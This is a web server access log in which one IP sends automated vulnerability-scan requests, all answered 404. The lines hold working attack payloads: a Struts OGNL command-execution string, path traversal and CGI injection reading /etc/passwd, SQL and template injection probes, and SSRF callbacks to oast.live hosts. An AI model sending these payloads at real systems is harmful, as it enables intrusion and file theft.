137.220.197.141 - - [21/Jan/2024:01:15:22 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:16:02 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:16:13 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:16:27 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:17:06 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:17:26 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:17:38 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:18:13 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:18:45 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:18:57 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:19:10 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:19:57 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:20:00 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:20:02 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:20:08 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:20:09 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:20:21 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:21:00 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:21:24 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:08 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:10 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:39 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:42 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:50 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:22:52 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:23:00 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:23:02 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:23:24 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:23:26 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:23:47 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:11 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:12 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:13 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:24 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:36 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:51 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:24:55 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:07 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:31 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:31 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:33 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:35 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:37 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:39 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:41 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:43 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:44 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:25:44 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:09 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:19 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:31 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:33 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:34 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:36 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:45 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:26:58 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:04 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:06 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:10 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:22 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:24 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:26 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:28 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:30 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:32 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:34 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:34 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:27:54 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:08 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:30 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:39 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:41 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:46 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:28:56 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:29:09 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:29:13 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:29:16 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:29:22 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:29:58 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:08 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:15 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:27 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:28 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:36 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:39 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:40 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:42 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:43 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:30:57 +0100] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:22 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:24 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:26 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:28 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:30 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:30 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:32 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:34 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:36 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:31:55 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:32:08 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:32:16 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:32:16 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:32:31 +0100] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:32:48 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:33:44 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:33:46 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:33:56 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:02 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:02 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:07 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:09 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:12 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:23 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:34:25 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:02 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogim1b4ys4py89p.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:18 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:23 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:34 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:45 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:46 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:35:58 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:10 +0100] "GET /BSW_cxttongr.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:17 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:24 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogdo8tpic6pn1uo.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:35 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogoxcws1xc4pin8.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:46 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogrjhj4nm9dojj8.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:50 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:36:52 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:37:52 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:31 +0100] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:31 +0100] "PUT /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:33 +0100] "GET /fileserver/2bECzKqaRr9vqOTJeu6wtrOtIZu.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:33 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:45 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:48 +0100] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:38:48 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:13 +0100] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:20 +0100] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:28 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:28 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:30 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:32 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:34 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:36 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:38 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:46 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsog5abjpdirbdy6w.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:39:50 +0100] "GET /command/prima-factory.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:07 +0100] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:11 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:13 +0100] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:27 +0100] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:28 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:30 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:31 +0100] "GET /DnnImageHandler.ashx?mode=file&url=http://cmm00rc3m87t5g88qsogs5zehe657chik.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:31 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:40:31 +0100] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 952
